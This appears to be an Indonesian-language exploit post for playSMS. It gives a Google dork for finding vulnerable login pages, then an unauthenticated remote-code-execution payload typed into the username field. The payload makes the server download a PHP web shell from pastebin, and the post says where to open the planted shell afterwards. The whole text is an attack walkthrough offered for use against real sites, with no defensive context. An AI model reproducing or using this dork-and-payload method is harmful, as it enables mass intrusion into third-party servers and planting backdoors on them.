Bayu_Santoso Google Dork : inurl:?app=main intitle:sms inurl:?app=main intext:"recover password" #Payload RCE : {{wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php}} Langkah-Langkah Exploitasi kalian dorking dulu jika sudah menemukan target maka akan muncul tempat login pada bagian username, masukkan payload rce : {{wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php}} Note : linuxploit.php bisa kalian ubah dengan nama sesuka kalian masukkan payload RCE pada username Access shell ?? site.com/shell.php / site.com/[path]/shell.php Referensi : https://sec.linuxploit.com/2020/04/playsms-unauthenticated-rce-upload-shell.html
